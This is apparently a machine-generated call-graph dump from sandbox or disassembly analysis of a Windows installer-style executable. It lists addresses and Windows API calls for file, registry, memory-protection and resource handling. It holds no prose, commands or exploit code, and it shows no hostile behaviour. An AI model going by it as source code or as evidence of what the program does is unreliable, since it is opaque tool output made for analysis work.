5907->5906 5908 40769c 5907->5908 5909 40748c 35 API calls 5908->5909 5909->5906 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6761 403f7d 6762 403fa2 6761->6762 6765 403f84 6761->6765 6764 403e8e 4 API calls 6762->6764 6762->6765 6763 403f8c 6764->6765 6765->6763 6766 402674 4 API calls 6765->6766 6767 403fca 6766->6767 6768 403d02 6770 403d12 6768->6770 6769 403ddf ExitProcess 6770->6769 6771 403db8 6770->6771 6775 403dea 6770->6775 6778 403da4 6770->6778 6779 403d8f MessageBoxA 6770->6779 6772 403cc8 4 API calls 6771->6772 6773 403dc2 6772->6773 6774 403cc8 4 API calls 6773->6774 6776 403dcc 6774->6776 6788 4019dc 6776->6788 6784 403fe4 6778->6784 6779->6771 6780 403dd1 6780->6769 6780->6775 6785 403fe8 6784->6785 6786 403f07 4 API calls 6785->6786 6787 404006 6786->6787 6789 401abb 6788->6789 6790 4019ed 6788->6790 6789->6780 6791 401a04 RtlEnterCriticalSection 6790->6791 6792 401a0e LocalFree 6790->6792 6791->6792 6793 401a41 6792->6793 6794 401a2f VirtualFree 6793->6794 6795 401a49 6793->6795 6794->6793 6796 401a70 LocalFree 6795->6796 6797 401a87 6795->6797 6796->6796 6796->6797 6798 401aa9 RtlDeleteCriticalSection 6797->6798 6799 401a9f RtlLeaveCriticalSection 6797->6799 6798->6780 6799->6798 6306 404206 6307 4041cc 6306->6307 6308 40420a 6306->6308 6309 403154 4 API calls 6308->6309 6310 404282 6308->6310 6311 404323 6309->6311 6312 402c08 6313 402c82 6312->6313 6316 402c19 6312->6316 6314 402c56 RtlUnwind 6315 403154 4 API calls 6314->6315 6315->6313 6316->6313 6316->6314 6319 402b28 6316->6319 6320 402b31 RaiseException 6319->6320 6321 402b47 6319->6321 6320->6321 6321->6314 6322 408c10 6323 408c17 6322->6323 6324 403198 4 API calls 6323->6324 6332 408cb1 6324->6332 6325 408cdc 6326 4031b8 4 API calls 6325->6326 6327 408d69 6326->6327 6328 408cc8 6330 4032fc 18 API calls 6328->6330 6329 403278 18 API calls 6329->6332 6330->6325 6331 4032fc 18 API calls 6331->6332 6332->6325 6332->6328 6332->6329 6332->6331 6337 40a814 6338 40a839 6337->6338 6339 40993c 29 API calls 6338->6339 6342 40a83e 6339->6342 6340 40a891 6371 4026c4 GetSystemTime 6340->6371 6342->6340 6345 408dd8 18 API calls 6342->6345 6343 40a896 6344 409330 46 API calls 6343->6344 6346 40a89e 6344->6346 6347 40a86d 6345->6347 6348 4031e8 18 API calls 6346->6348 6351 40a875 MessageBoxA 6347->6351 6349 40a8ab 6348->6349 6350 406928 19 API calls 6349->6350 6352 40a8b8 6350->6352 6351->6340 6353 40a882 6351->6353 6354 4066c0 19 API calls 6352->6354 6355 405864 19 API calls 6353->6355 6356 40a8c8 6354->6356 6355->6340 6357 406638 19 API calls 6356->6357 6358 40a8d9 6357->6358 6359 403340 18 API calls 6358->6359 6360 40a8e7 6359->6360 6361 4031e8 18 API calls 6360->6361 6362 40a8f7 6361->6362 6363 4074e0 37 API calls 6362->6363 6364 40a936 6363->6364 6365 402594 18 API calls 6364->6365 6366 40a956 6365->6366 6367 407a28 19 API calls 6366->6367 6368 40a998 6367->6368 6369 407cb8 35 API calls 6368->6369 6370 40a9bf 6369->6370 6371->6343 5449 407017 5450 407008 SetErrorMode 5449->5450 6372 403018 6373 403070 6372->6373 6374 403025 6372->6374 6375 40302a RtlUnwind 6374->6375 6376 40304e 6375->6376 6378 402f78 6376->6378 6379 402be8 6376->6379 6380 402bf1 RaiseException 6379->6380 6381 402c04 6379->6381 6380->6381 6381->6373 6386 40901e 6387 409010 6386->6387 6388 408fac Wow64RevertWow64FsRedirection 6387->6388 6389 409018 6388->6389 6390 409020 SetLastError 6391 409029 6390->6391 6406 403a28 ReadFile 6407 403a46 6406->6407 6408 403a49 GetLastError 6406->6408 5910 40762c ReadFile 5911 407663 5910->5911 5912 40764c 5910->5912 5913 407652 GetLastError 5912->5913 5914 40765c 5912->5914 5913->5911 5913->5914 5915 40748c 35 API calls 5914->5915 5915->5911 6810 40712e 6811 407118 6810->6811 6812 403198 4 API calls 6811->6812 6813 407120 6812->6813 6814 403198 4 API calls 6813->6814 6815 407128 6814->6815 5930 40a82f 5931 409ae8 18 API calls 5930->5931 5932 40a834 5931->5932 5933 40a839 5932->5933 5934 402f24 5 API calls 5932->5934 5967 40993c 5933->5967 5934->5933 5936 40a891 5972 4026c4 GetSystemTime 5936->5972 5938 40a83e 5938->5936 6033 408dd8 5938->6033 5939 40a896 5973 409330 5939->5973 5943 40a86d 5947 40a875 MessageBoxA 5943->5947 5944 4031e8 18 API calls 5945 40a8ab 5944->5945 5991 406928 5945->5991 5947->5936 5949 40a882 5947->5949 6036 405864 5949->6036 5954 40a8d9 6018 403340 5954->6018 5956 40a8e7 5957 4031e8 18 API calls 5956->5957 5958 40a8f7 5957->5958 5959 4074e0 37 API calls 5958->5959 5960 40a936 5959->5960 5961 402594 18 API calls 5960->5961 5962 40a956 5961->5962 5963 407a28 19 API calls 5962->5963 5964 40a998 5963->5964 5965 407cb8 35 API calls 5964->5965 5966 40a9bf 5965->5966 6040 40953c 5967->6040 5970 4098cc 19 API calls 5971 40995c 5970->5971 5971->5938 5972->5939 5980 409350 5973->5980 5976 409375 CreateDirectoryA 5977 4093ed 5976->5977 5978 40937f GetLastError 5976->5978 5979 40322c 4 API calls 5977->5979 5978->5980 5982 4093f7 5979->5982 5980->5976 5981 408dd8 18 API calls 5980->5981 5983 404c94 33 API calls 5980->5983 5986 407284 19 API calls 5980->5986 5989 408da8 18 API calls 5980->5989 5990 405890 18 API calls 5980->5990 6096 406cf4 5980->6096 6119 409224 5980->6119 5981->5980 5984 4031b8 4 API calls 5982->5984 5983->5980 5985 409411 5984->5985 5987 4031b8 4 API calls 5985->5987 5986->5980 5988 40941e 5987->5988 5988->5944 5989->5980 5990->5980 6225 406820 5991->6225 5994 403454 18 API calls 5995 40694a 5994->5995 5996 4066c0 5995->5996 6230 4068e4 5996->6230 5999 4066f0 6002 403340 18 API calls 5999->6002 6000 4066fe 6001 403454 18 API calls 6000->6001 6003 406711 6001->6003 6004 4066fc 6002->6004 6005 403340 18 API calls 6003->6005 6006 403198 4 API calls 6004->6006 6005->6004 6007 406733 6006->6007 6008 406638 6007->6008 6009 406642 6008->6009 6010 406665 6008->6010 6236 406950 6009->6236 6012 40322c 4 API calls 6010->6012 6014 40666e 6012->6014 6013 406649 6013->6010 6015 406654 6013->6015 6014->5954 6016 403340 18 API calls 6015->6016 6017 406662 6016->6017 6017->5954 6019 403344 6018->6019 6020 4033a5 6018->6020 6021 4031e8 6019->6021 6022 40334c 6019->6022 6026 403254 18 API calls 6021->6026 6028 4031fc 6021->6028 6022->6020 6024 40335b 6022->6024 6027 4031e8 18 API calls 6022->6027 6023 403228 6023->5956 6025 403254 18 API calls 6024->6025 6030 403375 6025->6030 6026->6028 6027->6024 6028->6023 6029 4025ac 4 API calls 6028->6029 6029->6023 6031 4031e8 18 API calls 6030->6031 6032 4033a1 6031->6032 6032->5956 6034 408da8 18 API calls 6033->6034 6035 408df4 6034->6035 6035->5943 6037 405869 6036->6037 6038 405940 19 API calls 6037->6038 6039 40587b 6038->6039 6039->6039 6047 40955b 6040->6047 6041 409590 6043 40959d GetUserDefaultLangID 6041->6043 6048 409592 6041->6048 6042 409594 6052 407024 GetModuleHandleA GetProcAddress 6042->6052 6043->6048 6046 40956f 6046->5970 6047->6041 6047->6042 6047->6046 6048->6046 6049 4095cb GetACP 6048->6049 6050 4095ef 6048->6050 6049->6046 6049->6048 6050->6046 6051 409615 GetACP 6050->6051 6051->6046 6051->6050 6053 407067 6052->6053 6054 40705e 6052->6054 6055 407070 6053->6055 6056 4070a8 6053->6056 6063 403198 4 API calls 6054->6063 6073 406f68 6055->6073 6057 406f68 RegOpenKeyExA 6056->6057 6061 4070c1 6057->6061 6059 407089 6060 4070de 6059->6060 6076 406f5c 6059->6076 6065 40322c 4 API calls 6060->6065 6061->6060 6064 406f5c 20 API calls 6061->6064 6067 407120 6063->6067 6068 4070d5 RegCloseKey 6064->6068 6069 4070eb 6065->6069 6070 403198 4 API calls 6067->6070 6068->6060 6071 4032fc 18 API calls 6069->6071 6072 407128 6070->6072 6071->6054 6072->6048 6074 406f73 6073->6074 6075 406f79 RegOpenKeyExA 6073->6075 6074->6075 6075->6059 6079 406e10 6076->6079 6080 406e36 RegQueryValueExA 6079->6080 6081 406e59 6080->6081 6086 406e7b 6080->6086 6082 406e73 6081->6082 6081->6086 6087 403278 18 API calls 6081->6087 6088 403420 18 API calls 6081->6088 6084 403198 4 API calls 6082->6084 6083 403198 4 API calls 6085 406f47 RegCloseKey 6083->6085 6084->6086 6085->6060 6086->6083 6087->6081 6089 406eb0 RegQueryValueExA 6088->6089 6089->6080 6090 406ecc 6089->6090 6090->6086 6091 4034f0 18 API calls 6090->6091 6092 406f0e 6091->6092 6093 406f20 6092->6093 6095 403420 18 API calls 6092->6095 6094 4031e8 18 API calls 6093->6094 6094->6086 6095->6093 6138 406a58 6096->6138 6099 406d26 6101 406a58 19 API calls 6099->6101 6103 406d72 6099->6103 6102 406d36 6101->6102 6104 406d42 6102->6104 6107 406a34 21 API calls 6102->6107 6146 406888 6103->6146 6104->6103 6105 406d67 6104->6105 6108 406a58 19 API calls 6104->6108 6105->6103 6158 406cc8 GetWindowsDirectoryA 6105->6158 6107->6104 6111 406d5b 6108->6111 6111->6105 6114 406a34 21 API calls 6111->6114 6112 406638 19 API calls 6113 406d87 6112->6113 6115 40322c 4 API calls 6113->6115 6114->6105 6116 406d91 6115->6116 6117 4031b8 4 API calls 6116->6117 6118 406dab 6117->6118 6118->5980 6120 409244 6119->6120 6121 406638 19 API calls 6120->6121 6122 40925d 6121->6122 6123 40322c 4 API calls 6122->6123 6130 409268 6123->6130 6124 406978 20 API calls 6124->6130 6126 408dd8 18 API calls 6126->6130 6127 4033b4 18 API calls 6127->6130 6128 405890 18 API calls 6128->6130 6130->6124 6130->6126 6130->6127 6130->6128 6131 4092e4 6130->6131 6198 4091b0 6130->6198 6206 409034 6130->6206 6132 40322c 4 API calls 6131->6132 6133 4092ef 6132->6133 6134 4031b8 4 API calls 6133->6134 6135 409309 6134->6135 6136 403198 4 API calls 6135->6136 6137 409311 6136->6137 6137->5980 6139 4034f0 18 API calls 6138->6139 6140 406a6b 6139->6140 6141 406a82 GetEnvironmentVariableA 6140->6141 6145 406a95 6140->6145 6160 406dec 6140->6160 6141->6140 6142 406a8e 6141->6142 6143 403198 4 API calls 6142->6143 6143->6145 6145->6099 6155 406a34 6145->6155 6147 403414 6146->6147 6148 4068ab GetFullPathNameA 6147->6148 6149 4068b7 6148->6149 6150 4068ce 6148->6150 6149->6150 6152 4068bf 6149->6152 6151 40322c 4 API calls 6150->6151 6153 4068cc 6151->6153 6154 403278 18 API calls 6152->6154 6153->6112 6154->6153 6164 4069dc 6155->6164 6159 406ce9 6158->6159 6159->6103 6161 406dfa 6160->6161 6162 4034f0 18 API calls 6161->6162 6163 406e08 6162->6163 6163->6140 6171 406978 6164->6171 6166 4069fe 6167 406a06 GetFileAttributesA 6166->6167 6168 406a1b 6167->6168 6169 403198 4 API calls 6168->6169 6170 406a23 6169->6170 6170->6099 6181 406744 6171->6181 6173 4069b0 6176 4069c6 6173->6176 6177 4069bb 6173->6177 6175 406989 6175->6173 6188 406970 CharPrevA 6175->6188 6189 403454 6176->6189 6179 40322c 4 API calls 6177->6179 6180 4069c4 6179->6180 6180->6166 6182 406755 6181->6182 6183 4067b9 6182->6183 6187 406773 6182->6187 6184 406680 IsDBCSLeadByte 6183->6184 6185 4067b4 6183->6185 6184->6185 6185->6175 6187->6185 6196 406680 IsDBCSLeadByte 6187->6196 6188->6175 6190 403486 6189->6190 6191 403459 6189->6191 6192 403198 4 API calls 6190->6192 6191->6190 6194 40346d 6191->6194 6193 40347c 6192->6193 6193->6180 6195 403278 18 API calls 6194->6195 6195->6193 6197 406694 6196->6197 6197->6187 6199 403198 4 API calls 6198->6199 6201 4091d1 6199->6201 6203 4091fe 6201->6203 6215 4032a8 6201->6215 6218 403494 6201->6218 6204 403198 4 API calls 6203->6204 6205 409213 6204->6205 6205->6130 6207 408f70 2 API calls 6206->6207 6208 40904a 6207->6208 6209 40904e 6208->6209 6222 406a48 6208->6222 6209->6130 6212 409081 6213 408fac Wow64RevertWow64FsRedirection 6212->6213 6214 409089 6213->6214 6214->6130 6216 403278 18 API calls 6215->6216 6217 4032b5 6216->6217 6217->6201 6219 403498 6218->6219 6221 4034c3 6218->6221 6220 4034f0 18 API calls 6219->6220 6220->6221 6221->6201 6223 4069dc 21 API calls 6222->6223 6224 406a52 GetLastError 6223->6224 6224->6212 6226 406744 IsDBCSLeadByte 6225->6226 6228 406835 6226->6228 6227 40687f 6227->5994 6228->6227 6229 406680 IsDBCSLeadByte 6228->6229 6229->6228 6231 4068f3 6230->6231 6232 406820 IsDBCSLeadByte 6231->6232 6235 4068fe 6232->6235 6233 4066ea 6233->5999 6233->6000 6234 406680 IsDBCSLeadByte 6234->6235 6235->6233 6235->6234 6237 406957 6236->6237 6238 40695b 6236->6238 6237->6013 6241 406970 CharPrevA 6238->6241 6240 40696c 6240->6013 6241->6240 6816 408f30 6819 408dfc 6816->6819 6820 408e05 6819->6820 6821 403198 4 API calls 6820->6821 6822 408e13 6820->6822 6821->6820 6823 403932 6824 403924 6823->6824 6825 40374c VariantClear 6824->6825 6826 40392c 6825->6826 5386 4075c4 SetFilePointer 5387 4075f7 5386->5387 5388 4075e7 GetLastError 5386->5388 5388->5387 5389 4075f0 5388->5389 5391 40748c GetLastError 5389->5391 5394 4073ec 5391->5394 5395 407284 19 API calls 5394->5395 5396 407414 5395->5396 5397 407434 5396->5397 5399 405194 33 API calls 5396->5399 5398 405890 18 API calls 5397->5398 5400 407443 5398->5400 5399->5397 5401 403198 4 API calls 5400->5401 5402 407460 5401->5402 5402->5387 6417 4076c8 WriteFile 6418 4076e8 6417->6418 6421 4076ef 6417->6421 6419 40748c 35 API calls 6418->6419 6419->6421 6420 407700 6421->6420 6422 4073ec 34 API calls 6421->6422 6422->6420 6423 402ccc 6426 402cfe 6423->6426 6427 402cdd 6423->6427 6424 402d88 RtlUnwind 6425 403154 4 API calls 6424->6425 6425->6426 6427->6424 6427->6426 6428 402b28 RaiseException 6427->6428 6429 402d7f 6428->6429 6429->6424 6835 403fcd 6836 403f07 4 API calls 6835->6836 6837 403fd6 6836->6837 6838 403e9c 4 API calls 6837->6838 6839 403fe2 6838->6839 6436 4024d0 6437 4024e4 6436->6437 6438 4024e9 6436->6438 6441 401918 4 API calls 6437->6441 6439 402518 6438->6439 6440 40250e RtlEnterCriticalSection 6438->6440 6443 4024ed 6438->6443 6451 402300 6439->6451 6440->6439 6441->6438 6444 402525 6447 402581 6444->6447 6448 402577 RtlLeaveCriticalSection 6444->6448 6446 401fd4 14 API calls 6449 402531 6446->6449 6448->6447 6449->6444 6450 40215c 9 API calls 6449->6450 6450->6444 6452 402314 6451->6452 6454 4023b8 6452->6454 6455 402335 6452->6455 6453 402344 6453->6444 6453->6446 6454->6453 6456 401d80 9 API calls 6454->6456 6459 402455 6454->6459 6461 401e84 6454->6461 6455->6453 6457 401b74 9 API calls 6455->6457 6456->6454 6457->6453 6459->6453 6460 401d00 9 API calls 6459->6460 6460->6453 6466 401768 6461->6466 6463 401e99 6464 401ea6 6463->6464 6465 401dcc 9 API calls 6463->6465 6464->6454 6465->6464 6467 401787 6466->6467 6468 40183b 6467->6468 6469 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6467->6469 6470 40132c LocalAlloc 6467->6470 6472 401821 6467->6472 6474 4017d6 6467->6474 6471 4015c4 VirtualAlloc 6468->6471 6475 4017e7 6468->6475 6469->6467 6470->6467 6471->6475 6473 40150c VirtualFree 6472->6473 6473->6475 6476 40150c VirtualFree 6474->6476 6475->6463 6476->6475 6477 4028d2 6478 4028da 6477->6478 6479 403554 4 API calls 6478->6479 6480 4028ef 6478->6480 6479->6478 6481 4025ac 4 API calls 6480->6481 6482 4028f4 6481->6482 6840 4019d3 6841 4019ba 6840->6841 6842 4019c3 RtlLeaveCriticalSection 6841->6842 6843 4019cd 6841->6843 6842->6843 5403 407fd4 5404 407fe6 5403->5404 5406 407fed 5403->5406 5414 407f10 5404->5414 5407 408021 5406->5407 5408 408015 5406->5408 5409 408017 5406->5409 5410 40804e 5407->5410 5412 407d7c 33 API calls 5407->5412 5428 407e2c 5408->5428 5425 407d7c 5409->5425 5412->5410 5415 407f25 5414->5415 5416 407d7c 33 API calls 5415->5416 5417 407f34 5415->5417 5416->5417 5418 407f6e 5417->5418 5420 407d7c 33 API calls 5417->5420 5419 407f82 5418->5419 5421 407d7c 33 API calls 5418->5421 5424 407fae 5419->5424 5435 407eb8 5419->5435 5420->5418 5421->5419 5424->5406 5438 4058c4 5425->5438 5427 407d9e 5427->5407 5429 405194 33 API calls 5428->5429 5430 407e57 5429->5430 5446 407de4 5430->5446 5432 407e5f 5433 403198 4 API calls 5432->5433 5434 407e74 5433->5434 5434->5407 5436 407ec7 VirtualFree 5435->5436 5437 407ed9 VirtualAlloc 5435->5437 5436->5437 5437->5424 5440 4058d0 5438->5440 5439 405194 33 API calls 5441 4058fd 5439->5441 5440->5439 5442 4031e8 18 API calls 5441->5442 5443 405908 5442->5443 5444 403198 4 API calls 5443->5444 5445 40591d 5444->5445 5445->5427 5447 4058c4 33 API calls 5446->5447 5448 407e06 5447->5448 5448->5432 6483 405ad4 6484 405ae4 6483->6484 6485 405adc 6483->6485 6486 405ae2 6485->6486 6487 405aeb 6485->6487 6490 405a4c 6486->6490 6488 405940 19 API calls 6487->6488 6488->6484 6491 405a54 6490->6491 6492 405a6e 6491->6492 6493 403154 4 API calls 6491->6493 6494 405a73 6492->6494 6495 405a8a 6492->6495 6493->6491 6496 405940 19 API calls 6494->6496 6497 403154 4 API calls 6495->6497 6498 405a86 6496->6498 6499 405a8f 6497->6499 6501 403154 4 API calls 6498->6501 6500 4059b0 33 API calls 6499->6500 6500->6498 6502 405ab8 6501->6502 6503 403154 4 API calls 6502->6503 6504 405ac6 6503->6504 6504->6484 5916 40a9de 5917 40aa03 5916->5917 5918 407918 InterlockedExchange 5917->5918 5919 40aa2d 5918->5919 5920 40aa3d 5919->5920 5921 409ae8 18 API calls 5919->5921 5926 4076ac SetEndOfFile 5920->5926 5921->5920 5923 40aa59 5924 4025ac 4 API calls 5923->5924 5925 40aa90 5924->5925 5927 4076c3 5926->5927 5928 4076bc 5926->5928 5927->5923 5929 40748c 35 API calls 5928->5929 5929->5927 6847 402be9 RaiseException 6848 402c04 6847->6848 6515 402af2 6516 402afe 6515->6516 6519 402ed0 6516->6519 6520 403154 4 API calls 6519->6520 6522 402ee0 6520->6522 6521 402b03 6522->6521 6524 402b0c 6522->6524 6525 402b25 6524->6525 6526 402b15 RaiseException 6524->6526 6525->6521 6526->6525 5454 40a5f8 5497 4030dc 5454->5497 5456 40a60e 5500 4042e8 5456->5500 5458 40a613 5503 40457c GetModuleHandleA GetProcAddress 5458->5503 5462 40a61d 5511 4065c8 5462->5511 5464 40a622 5520 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5464->5520 5471 40a665 5542 406c2c 5471->5542 5475 4031e8 18 API calls 5476 40a683 5475->5476 5556 4074e0 5476->5556 5482 407918 InterlockedExchange 5484 40a6d2 5482->5484 5483 40a710 5576 4074a0 5483->5576 5484->5483 5613 409ae8 5484->5613 5486 40a751 5580 407a28 5486->5580 5487 40a736 5487->5486 5488 409ae8 18 API calls 5487->5488 5488->5486 5490 40a776 5590 408b08 5490->5590 5494 40a7bc 5495 408b08 35 API calls 5494->5495 5496 40a7f5 5494->5496 5495->5494 5623 403094 5497->5623 5499 4030e1 GetModuleHandleA GetCommandLineA 5499->5456 5501 403154 4 API calls 5500->5501 5502 404323 5500->5502 5501->5502 5502->5458 5504 404598 5503->5504 5505 40459f GetProcAddress 5503->5505 5504->5505 5506 4045b5 GetProcAddress 5505->5506 5507 4045ae 5505->5507 5508 4045c4 SetProcessDEPPolicy 5506->5508 5509 4045c8 5506->5509 5507->5506 5508->5509 5510 404624 6F561CD0 5509->5510 5510->5462 5624 405ca8 5511->5624 5521 4090f7 5520->5521 5708 406fa0 SetErrorMode 5521->5708 5524 407284 19 API calls 5525 409127 5524->5525 5526 403198 4 API calls 5525->5526 5527 40913c 5526->5527 5528 409b78 GetSystemInfo VirtualQuery 5527->5528 5529 409ba2 5528->5529 5530 409c2c 5528->5530 5529->5530 5531 409c0d VirtualQuery 5529->5531 5532 409bcc VirtualProtect 5529->5532 5533 409bfb VirtualProtect 5529->5533 5534 409768 5530->5534 5531->5529 5531->5530 5532->5529 5533->5531 5714 406bd0 GetCommandLineA 5534->5714 5536 409850 5537 4031b8 4 API calls 5536->5537 5539 40986a 5537->5539 5538 406c2c 20 API calls 5541 409785 5538->5541 5539->5471 5606 409c88 5539->5606 5540 403454 18 API calls 5540->5541 5541->5536 5541->5538 5541->5540 5543 406c53 GetModuleFileNameA 5542->5543 5544 406c77 GetCommandLineA 5542->5544 5545 403278 18 API calls 5543->5545 5552 406c7c 5544->5552 5546 406c75 5545->5546 5550 406ca4 5546->5550 5547 406c81 5548 403198 4 API calls 5547->5548 5551 406c89 5548->5551 5549 406af0 18 API calls 5549->5552 5553 403198 4 API calls 5550->5553 5554 40322c 4 API calls 5551->5554 5552->5547 5552->5549 5552->5551 5555 406cb9 5553->5555 5554->5550 5555->5475 5557 4074ea 5556->5557 5721 407576 5557->5721 5724 407578 5557->5724 5558 407516 5559 40752a 5558->5559 5560 40748c 35 API calls 5558->5560 5563 409c34 FindResourceA 5559->5563 5560->5559 5564 409c49 5563->5564 5565 409c4e SizeofResource 5563->5565 5566 409ae8 18 API calls 5564->5566 5567 409c60 LoadResource 5565->5567 5568 409c5b 5565->5568 5566->5565 5570 409c73 LockResource 5567->5570 5571 409c6e 5567->5571 5569 409ae8 18 API calls 5568->5569 5569->5567 5573 409c84 5570->5573 5574 409c7f 5570->5574 5572 409ae8 18 API calls 5571->5572 5572->5570 5573->5482 5573->5484 5575 409ae8 18 API calls 5574->5575 5575->5573 5578 4074b4 5576->5578 5577 4074c4 5577->5487 5578->5577 5579 4073ec 34 API calls 5578->5579 5579->5577 5581 407a35 5580->5581 5582 405890 18 API calls 5581->5582 5583 407a89 5581->5583 5582->5583 5584 407918 InterlockedExchange 5583->5584 5585 407a9b 5584->5585 5586 405890 18 API calls 5585->5586 5587 407ab1 5585->5587 5586->5587 5588 405890 18 API calls 5587->5588 5589 407af4 5587->5589 5588->5589 5589->5490 5592 408b39 5590->5592 5596 408b82 5590->5596 5591 408bcd 5727 407cb8 5591->5727 5594 4034f0 18 API calls 5592->5594 5592->5596 5599 403420 18 API calls 5592->5599 5600 4031e8 18 API calls 5592->5600 5604 407cb8 35 API calls 5592->5604 5594->5592 5595 408be4 5598 4031b8 4 API calls 5595->5598 5596->5591 5597 4034f0 18 API calls 5596->5597 5602 403420 18 API calls 5596->5602 5603 4031e8 18 API calls 5596->5603 5605 407cb8 35 API calls 5596->5605 5597->5596 5601 408bfe 5598->5601 5599->5592 5600->5592 5620 404c20 5601->5620 5602->5596 5603->5596 5604->5592 5605->5596 5607 40322c 4 API calls 5606->5607 5608 409cab 5607->5608 5609 409cba MessageBoxA 5608->5609 5610 409ccf 5609->5610 5611 403198 4 API calls 5610->5611 5612 409cd7 5611->5612 5612->5471 5614 409af1 5613->5614 5615 409b09 5613->5615 5617 405890 18 API calls 5614->5617 5616 405890 18 API calls 5615->5616 5618 409b1a 5616->5618 5619 409b03 5617->5619 5618->5483 5619->5483 5749 402594 5620->5749 5622 404c2b 5622->5494 5623->5499 5625 405940 19 API calls 5624->5625 5626 405cb9 5625->5626 5627 405280 GetSystemDefaultLCID 5626->5627 5631 4052b6 5627->5631 5628 404cdc 19 API calls 5628->5631 5629 40520c 19 API calls 5629->5631 5630 4031e8 18 API calls 5630->5631 5631->5628 5631->5629 5631->5630 5632 405318 5631->5632 5633 404cdc 19 API calls 5632->5633 5634 40520c 19 API calls 5632->5634 5635 4031e8 18 API calls 5632->5635 5636 40539b 5632->5636 5633->5632 5634->5632 5635->5632 5637 4031b8 4 API calls 5636->5637 5638 4053b5 5637->5638 5639 4053c4 GetSystemDefaultLCID 5638->5639 5696 40520c GetLocaleInfoA 5639->5696 5642 4031e8 18 API calls 5643 405404 5642->5643 5644 40520c 19 API calls 5643->5644 5645 405419 5644->5645 5646 40520c 19 API calls 5645->5646 5647 40543d 5646->5647 5702 405258 GetLocaleInfoA 5647->5702 5650 405258 GetLocaleInfoA 5651 40546d 5650->5651 5652 40520c 19 API calls 5651->5652 5653 405487 5652->5653 5654 405258 GetLocaleInfoA 5653->5654 5655 4054a4 5654->5655 5656 40520c 19 API calls 5655->5656 5657 4054be 5656->5657 5658 4031e8 18 API calls 5657->5658 5659 4054cb 5658->5659 5660 40520c 19 API calls 5659->5660 5661 4054e0 5660->5661 5662 4031e8 18 API calls 5661->5662 5663 4054ed 5662->5663 5664 405258 GetLocaleInfoA 5663->5664 5665 4054fb 5664->5665 5666 40520c 19 API calls 5665->5666 5667 405515 5666->5667 5668 4031e8 18 API calls 5667->5668 5669 405522 5668->5669 5670 40520c 19 API calls 5669->5670 5671 405537 5670->5671 5672 4031e8 18 API calls 5671->5672 5673 405544 5672->5673 5674 40520c 19 API calls 5673->5674 5675 405559 5674->5675 5676 405576 5675->5676 5677 405567 5675->5677 5679 40322c 4 API calls 5676->5679 5704 40322c 5677->5704 5680 405574 5679->5680 5681 40520c 19 API calls 5680->5681 5682 405598 5681->5682 5683 4055b5 5682->5683 5684 4055a6 5682->5684 5686 403198 4 API calls 5683->5686 5685 40322c 4 API calls 5684->5685 5687 4055b3 5685->5687 5686->5687 5688 4033b4 18 API calls 5687->5688 5689 4055d7 5688->5689 5690 4033b4 18 API calls 5689->5690 5691 4055f1 5690->5691 5692 4031b8 4 API calls 5691->5692 5693 40560b 5692->5693 5694 405cf4 GetVersionExA 5693->5694 5695 405d0b 5694->5695 5695->5464 5697 405233 5696->5697 5698 405245 5696->5698 5699 403278 18 API calls 5697->5699 5700 40322c 4 API calls 5698->5700 5701 405243 5699->5701 5700->5701 5701->5642 5703 405274 5702->5703 5703->5650 5706 403230 5704->5706 5705 403252 5705->5680 5706->5705 5707 4025ac 4 API calls 5706->5707 5707->5705 5712 403414 5708->5712 5711 406fee 5711->5524 5713 403418 LoadLibraryA 5712->5713 5713->5711 5715 406af0 18 API calls 5714->5715 5716 406bf3 5715->5716 5717 406af0 18 API calls 5716->5717 5718 406c05 5716->5718 5717->5716 5719 403198 4 API calls 5718->5719 5720 406c1a 5719->5720 5720->5541 5722 407578 5721->5722 5723 4075b7 CreateFileA 5722->5723 5723->5558 5725 403414 5724->5725 5726 4075b7 CreateFileA 5725->5726 5726->5558 5728 407cd3 5727->5728 5732 407cc8 5727->5732 5733 407c5c 5728->5733 5731 405890 18 API calls 5731->5732 5732->5595 5734 407c70 5733->5734 5735 407caf 5733->5735 5734->5735 5737 407bac 5734->5737 5735->5731 5735->5732 5738 407bb7 5737->5738 5739 407bc8 5737->5739 5740 405890 18 API calls 5738->5740 5741 4074a0 34 API calls 5739->5741 5740->5739 5742 407bdc 5741->5742 5743 4074a0 34 API calls 5742->5743 5744 407bfd 5743->5744 5745 407918 InterlockedExchange 5744->5745 5746 407c12 5745->5746 5747 407c28 5746->5747 5748 405890 18 API calls 5746->5748 5747->5734 5748->5747 5750 402598 5749->5750 5752 4025a2 5749->5752 5755 401fd4 5750->5755 5751 40259e 5751->5752 5753 403154 4 API calls 5751->5753 5752->5622 5752->5752 5753->5752 5756 401fe8 5755->5756 5757 401fed 5755->5757 5766 401918 RtlInitializeCriticalSection 5756->5766 5759 402012 RtlEnterCriticalSection 5757->5759 5760 40201c 5757->5760 5763 401ff1 5757->5763 5759->5760 5760->5763 5773 401ee0 5760->5773 5763->5751 5764 402147 5764->5751 5765 40213d RtlLeaveCriticalSection 5765->5764 5767 40193c RtlEnterCriticalSection 5766->5767 5768 401946 5766->5768 5767->5768 5769 401964 LocalAlloc 5768->5769 5770 40197e 5769->5770 5771 4019c3 RtlLeaveCriticalSection 5770->5771 5772 4019cd 5770->5772 5771->5772 5772->5757 5776 401ef0 5773->5776 5774 401f1c 5777 401f40 5774->5777 5784 401d00 5774->5784 5776->5774 5776->5777 5779 401e58 5776->5779 5777->5764 5777->5765 5788 4016d8 5779->5788 5782 401e75 5782->5776 5785 401d4e 5784->5785 5786 401d1e 5784->5786 5785->5786 5857 401c68 5785->5857 5786->5777 5791 4016f4 5788->5791 5790 4016fe 5813 4015c4 5790->5813 5791->5790 5795 40174f 5791->5795 5797 40175b 5791->5797 5805 401430 5791->5805 5817 40132c 5791->5817 5794 40170a 5794->5797 5821 40150c 5795->5821 5797->5782 5798 401dcc 5797->5798 5831 401d80 5798->5831 5801 40132c LocalAlloc 5803 401df0 5801->5803 5802 401df8 5802->5782 5803->5802 5835 401b44 5803->5835 5806 40143f VirtualAlloc 5805->5806 5808 40146c 5806->5808 5809 40148f 5806->5809 5825 4012e4 5808->5825 5809->5791 5812 40147c VirtualFree 5812->5809 5815 40160a 5813->5815 5814 40163a 5814->5794 5815->5814 5816 401626 VirtualAlloc 5815->5816 5816->5814 5816->5815 5818 401348 5817->5818 5819 4012e4 LocalAlloc 5818->5819 5820 40138f 5819->5820 5820->5791 5824 40153b 5821->5824 5822 401594 5822->5797 5823 401568 VirtualFree 5823->5824 5824->5822 5824->5823 5828 40128c 5825->5828 5829 401298 LocalAlloc 